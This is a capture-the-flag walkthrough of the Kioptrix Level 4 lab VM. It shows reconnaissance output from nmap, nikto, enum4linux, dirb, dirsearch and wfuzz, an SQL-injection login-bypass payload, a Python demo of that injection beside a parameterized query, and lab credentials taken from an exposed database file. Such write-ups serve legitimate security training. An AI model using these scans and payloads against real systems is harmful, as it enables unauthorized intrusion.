Disclaimer
This document is for learning and research only. Do not use the techniques or source code in this article for illegal purposes; any negative consequences caused by anyone are unrelated to the author.
Table of Contents
- Disclaimer
- Preface
- I. Environment Setup
- 1.1 Target information
- 1.2 Target configuration
- II. Information Gathering
- 2.1 Host discovery
- 2.1.1 netdiscover
- 2.1.2 arp-scan host scan
- 2.2 Port scanning
- 2.3 Fingerprinting
- 2.4 Directory scanning
- 2.4.1 dirb directory scan
- 2.4.2 dirsearch directory scan
- 2.5 Vulnerability entry points
- 2.5.1 Visiting the home page
- 2.5.2 nmap vulnerability scan
- 2.5.3 nikto vulnerability scan
- 2.5.4 enum4linux scan
- 2.5.5 wfuzz fuzzing
- 2.5.6 searchsploit search for Samba exploits
- III. Penetration Testing
- 3.1 SQL injection
- 3.1.1 Capturing the login request with Burp Suite
- 3.1.2 Enumerating databases
- 3.1.3 Current database
- 3.1.4 Tables in the current database
- 3.1.5 Column names
- 3.1.6 Usernames and passwords
- 3.2 Shell escape
- 3.2.1 SSH login
- 3.2.2 Shell escape
- 3.3 MySQL UDF privilege escalation
- 3.3.1 Checking services
- 3.3.2 Finding PHP files
- 3.3.3 Viewing the PHP file
- 3.3.4 Logging into MySQL
- 3.3.5 Viewing the udf table
- 3.3.6 Adding the user to the admin group
- 3.3.7 Switching to the superuser
- 3.3.8 flag
- Summary
- References
Preface
Today's test: penetrating the Kioptrix Level #4 target machine.
Vulnhub is a platform that provides a variety of vulnerable environments; most of them are ready-made virtual machine images with several vulnerabilities built in. This article walks through a penetration test of the Kioptrix Level #4 target, covering host discovery (nmap\netdiscover), port scanning (nmap\masscan), directory scanning (dirb\dirsearch), SQL injection, and UDF privilege escalation.
Description
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:
1. It's possible to get root remotely [ Edit: sorry not what I meant ]
1a. It's possible to remotely compromise the machine
2. Stays within the target audience of this site
3. Must be "realistic" (well kinda…)
4. Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven't done in a while.
I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
I'd love to code some small custom application for people to exploit. But I'm an administrator not a coder. It would take too much time to learn/code such an application. Not saying I'll never try doing one, but I wouldn't hold my breath. If someone wants more difficult challenges, I'm sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec's PWB course. *shameless plug
– A few things I must say. I made this image using a new platform. Hoping everything works but I can't test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn't go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don't be surprised if it takes a little moment for this one to boot up. It's trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it's not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.
– Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to "Legacy Network Adapter". I've tested the file and this one seems to run fine for me… If you're having problems, or it's not working for any reason email comms[=]kioptrix.com
Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
So I hope you enjoy this one.
The Kioptrix Team
Source: http://www.kioptrix.com/blog/?p=604
Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive
I. Environment Setup
1.1 Target information
Official link | https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ |
---|---|
Release date | 8 February 2012 |
Size | 208MB |
Author | Kioptrix |
Series | Kioptrix |
Difficulty | ★☆☆☆☆ |
1.2 Target configuration
- For the penetration testing environment setup, refer to the author's earlier post: Vulnhub target practice series - DC-2 walkthrough
- [Fix] The target VM cannot obtain an IP address automatically after being imported into VMware
- It is recommended to set the attacking machine (Kali) network mode to [Bridged]
- Importing a vmdk file into VMware (tested and working)
II. Information Gathering
2.1 Host discovery
2.1.1 netdiscover
┌──(root㉿kali)-[/home/kali]
└─# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.6 00:0c:29:41:10:00 1 60 VMware, Inc.
192.168.1.13 ae:d5:7e:a8:51:6a 2 120 Unknown vendor
192.168.1.1 a0:54:f9:b3:23:54 2 120 Unknown vendor
2.1.2 arp-scan host scan
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.6 00:0c:29:41:10:00 VMware, Inc.
192.168.1.13 ae:d5:7e:a8:51:6a (Unknown: locally administered)
192.168.1.8 22:cb:7f:9b:2c:c1 (Unknown: locally administered)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.388 seconds (107.20 hosts/sec). 3 responded
Combining the two scan methods above, the target information is:
IP address: 192.168.1.11
MAC address: 00:0c:29:b2:d4:13
2.2 Port scanning
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptrix4 192.168.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:34 EDT
Nmap scan report for 192.168.1.6
Host is up (0.00028s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2024-06-12T16:34:31-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.34 seconds
In summary, the target's open ports are:
Port 22: SSH service
Port 80: HTTP service
Port 139: netbios-ssn
Port 445: netbios-ssn
2.3 Fingerprinting
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.1.6
WhatWeb report for http://192.168.1.6
Status : 200 OK
Title : <None>
IP : 192.168.1.6
Country : RESERVED, ZZ
Summary : Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], PasswordField[mypassword], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], X-Powered-By[PHP/5.2.4-2ubuntu5.6]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.8 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.2.4-2ubuntu5.6
Module : Suhosin-Patch
Version : 5.2.4-2ubuntu5.6
Google Dorks: (2)
Website : http://www.php.net/
[ PasswordField ]
find password fields
String : mypassword (from field name)
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 12 Jun 2024 20:38:05 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Content-Length: 1255
Connection: close
Content-Type: text/html
Key information obtained:
- Apache[2.2.8],
- HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch],
- PasswordField[mypassword],
- PHP[5.2.4-2ubuntu5.6][Suhosin-Patch],
- X-Powered-By[PHP/5.2.4-2ubuntu5.6]
2.4 Directory scanning
2.4.1 dirb directory scan
┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.1.6
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 12 08:40:08 2024
URL_BASE: http://192.168.1.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.6/ ----
+ http://192.168.1.6/cgi-bin/ (CODE:403|SIZE:326)
==> DIRECTORY: http://192.168.1.6/images/
+ http://192.168.1.6/index (CODE:200|SIZE:1255)
+ http://192.168.1.6/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.1.6/john/
+ http://192.168.1.6/logout (CODE:302|SIZE:0)
+ http://192.168.1.6/member (CODE:302|SIZE:220)
+ http://192.168.1.6/server-status (CODE:403|SIZE:331)
---- Entering directory: http://192.168.1.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jun 12 08:40:33 2024
DOWNLOADED: 4612 - FOUND: 6
FOUND: 6, six paths found:
- http://192.168.1.6/cgi-bin/
- http://192.168.1.6/index
- http://192.168.1.6/index.php
- http://192.168.1.6/logout
- http://192.168.1.6/member
- http://192.168.1.6/server-status
2.4.2 dirsearch directory scan
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.1.6 -e * -x 404,403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.1.6/_24-06-12_08-40-50.txt
Target: http://192.168.1.6/
[08:40:50] Starting:
[08:41:17] 200 - 109B - /checklogin
[08:41:17] 200 - 109B - /checklogin.php
[08:41:22] 200 - 298B - /database.sql
[08:41:33] 301 - 350B - /images -> http://192.168.1.6/images/
[08:41:33] 200 - 930B - /images/
[08:41:40] 302 - 0B - /logout/ -> index.php
[08:41:40] 302 - 0B - /logout -> index.php
[08:41:42] 302 - 220B - /member/ -> index.php
[08:41:42] 302 - 220B - /member -> index.php
[08:41:42] 302 - 220B - /member/login -> index.php
[08:41:42] 302 - 220B - /member/admin.asp -> index.php
[08:41:42] 302 - 220B - /member/logon -> index.php
[08:41:42] 302 - 220B - /member/login.rb -> index.php
[08:41:42] 302 - 220B - /member/signin -> index.php
[08:41:42] 302 - 220B - /member/login.html -> index.php
[08:41:42] 302 - 220B - /member.php -> index.php
[08:41:42] 302 - 220B - /member/login.jsp -> index.php
[08:41:42] 302 - 220B - /member/login.asp -> index.php
[08:41:42] 302 - 220B - /member/login.py -> index.php
[08:41:42] 302 - 220B - /member/login.39772.zip -> index.php
Task Completed
The scan results show the paths found. Note that the unquoted * in "-e *" was expanded by the shell (the banner reports Extensions: 39772.zip); quote it as -e '*' to have dirsearch test every extension.
2.5 Vulnerability entry points
2.5.1 Visiting the home page
Visit:
- http://192.168.1.6/
Payload test:
- username: john
- password: 1' or '1'='1
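As an added example (not code from the original post or from the Kioptrix VM), the script below reproduces against an in-memory SQLite table, standing in for the target's MySQL, why this password payload bypasses a login query built by string concatenation and why a parameterized query is unaffected. The members table, its rows, and the query shape are assumptions; john/1234 is the credential pair exposed in database.sql later in this write-up.

```python
import sqlite3

# Constructed sample data: a members table shaped like the one the login
# form (myusername / mypassword -> checklogin.php) is assumed to query.
# john/1234 is taken from the exposed database.sql; robert's password is
# a placeholder.
SAMPLE_ROWS = [("john", "1234"), ("robert", "placeholder-password")]

# The password payload tested on the login page.
PAYLOAD = "1' or '1'='1"


def make_db():
    """In-memory SQLite stands in for the target's MySQL; the SQL used
    here behaves the same way in both engines."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_ROWS)
    return con


def build_query(myusername, mypassword):
    """String concatenation, the assumed (vulnerable) checklogin.php style:
    user input is pasted straight into the SQL text."""
    return ("SELECT username FROM members WHERE username='%s' "
            "AND password='%s' ORDER BY username" % (myusername, mypassword))


def login_vulnerable(con, myusername, mypassword):
    """Returns every username the concatenated query matches."""
    return [r[0] for r in con.execute(build_query(myusername, mypassword))]


def login_safe(con, myusername, mypassword):
    """Parameterized query: input is bound as data, never parsed as SQL."""
    sql = ("SELECT username FROM members WHERE username=? AND password=? "
           "ORDER BY username")
    return [r[0] for r in con.execute(sql, (myusername, mypassword))]


def demo():
    con = make_db()
    return {
        # The quote in the payload ends the password literal; "or '1'='1'"
        # is always true and, since AND binds tighter than OR, every row
        # satisfies the WHERE clause, so the query returns all members.
        "vulnerable_with_payload": login_vulnerable(con, "john", PAYLOAD),
        "vulnerable_wrong_password": login_vulnerable(con, "john", "wrong"),
        # With a bound parameter the payload is compared as a literal
        # password string and matches nothing.
        "safe_with_payload": login_safe(con, "john", PAYLOAD),
        "safe_real_credentials": login_safe(con, "john", "1234"),
        # The SQL text the database actually receives in the vulnerable case.
        "query_seen_by_db": build_query("john", PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```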
2.5.2 nmap vulnerability scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -v -sS -Pn -T4 --script=vuln 192.168.1.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:47 EDT
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:47
Completed NSE at 08:47, 10.01s elapsed
Initiating NSE at 08:47
Completed NSE at 08:47, 0.00s elapsed
Initiating ARP Ping Scan at 08:47
Scanning 192.168.1.6 [1 port]
Completed ARP Ping Scan at 08:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:47
Completed Parallel DNS resolution of 1 host. at 08:47, 5.24s elapsed
Initiating SYN Stealth Scan at 08:47
Scanning 192.168.1.6 [1000 ports]
Discovered open port 22/tcp on 192.168.1.6
Discovered open port 139/tcp on 192.168.1.6
Discovered open port 445/tcp on 192.168.1.6
Discovered open port 80/tcp on 192.168.1.6
Completed SYN Stealth Scan at 08:47, 2.15s elapsed (1000 total ports)
Initiating Service scan at 08:47
Scanning 4 services on 192.168.1.6
Completed Service scan at 08:47, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.6
NSE: Script scanning 192.168.1.6.
Initiating NSE at 08:47
Completed NSE at 08:54, 362.52s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.09s elapsed
Nmap scan report for 192.168.1.6
Host is up (0.0010s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-enum:
| /database.sql: Possible database backup
| /icons/: Potentially interesting folder w/ directory listing
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.6
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.6:80/
| Form id: myusername
| Form action: checklogin.php
|
| Path: http://192.168.1.6:80/checklogin.php
| Form id:
| Form action: index.php
|
| Path: http://192.168.1.6:80/index.php
| Form id: myusername
|_ Form action: checklogin.php
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.019 days (since Wed Jun 12 08:27:20 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
TRACEROUTE
HOP RTT ADDRESS
1 1.02 ms 192.168.1.6
NSE: Script Post-scanning.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.04 seconds
Raw packets sent: 1450 (64.546KB) | Rcvd: 1226 (172.149KB)
2.5.3 nikto vulnerability scan
┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.1.6
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.6
+ Target Hostname: 192.168.1.6
+ Target Port: 80
+ Start Time: 2024-06-12 08:47:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /database.sql: Server may leak inodes via ETags, header found with file /database.sql, inode: 148370, size: 298, mtime: Sat Feb 4 11:11:51 2012. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /database.sql: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /database.sql: Database SQL found.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /member.php?vwar_root=http://blog.cirt.net/rfiinc.txt: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 1 error(s) and 22 item(s) reported on remote host
+ End Time: 2024-06-12 08:48:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
/database.sql: Database SQL found.
A database file was found.
Accessing the database file:
- http://192.168.1.6/database.sql
Users found:
- username: john
- password: 1234
Logging in through the web page with these credentials fails.
2.5.4 enum4linux scan
┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168..1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:51:13 2024
=========================================( Target Information )=========================================
Target ........... 192.168..1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 192.168..1.6 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 192.168..1.6 )================================
Looking up status of 0.0.0.0
No reply from 0.0.0.0
===================================( Session Check on 192.168..1.6 )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168.1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:55:42 2024
=========================================( Target Information )=========================================
Target ........... 192.168.1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 192.168.1.6 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 192.168.1.6 )================================
Looking up status of 192.168.1.6
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
====================================( Session Check on 192.168.1.6 )====================================
[+] Server 192.168.1.6 allows sessions using username '', password ''
=================================( Getting domain SID for 192.168.1.6 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
===================================( OS information on 192.168.1.6 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.1.6 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
========================================( Users on 192.168.1.6 )========================================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
==================================( Share Enumeration on 192.168.1.6 )==================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
[+] Attempting to map shares on 192.168.1.6
//192.168.1.6/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.6/IPC$ Mapping: N/A Listing: N/A Writing: N/A
============================( Password Policy Information for 192.168.1.6 )============================
[+] Attaching to 192.168.1.6 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] KIOPTRIX4
[+] Builtin
[+] Password Info for Domain: KIOPTRIX4
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
=======================================( Groups on 192.168.1.6 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 192.168.1.6 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
================================( Getting printer info for 192.168.1.6 )================================
No printers returned.
enum4linux complete on Wed Jun 12 08:56:26 2024
2.5.5 wfuzz fuzzing
┌──(root㉿kali)-[/home/kali]
└─# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.1.6/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.6/FUZZ
Total requests: 3024
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001629: 302 0 L 0 W 0 Ch "logout"
000001736: 302 1 L 22 W 220 Ch "member"
000002294: 301 9 L 31 W 350 Ch "robert"
000001458: 301 9 L 31 W 348 Ch "john"
000001350: 200 45 L 94 W 1255 Ch "index"
000001337: 301 9 L 31 W 350 Ch "images"
000000566: 403 10 L 33 W 326 Ch "cgi-bin/"
Total time: 5.687175
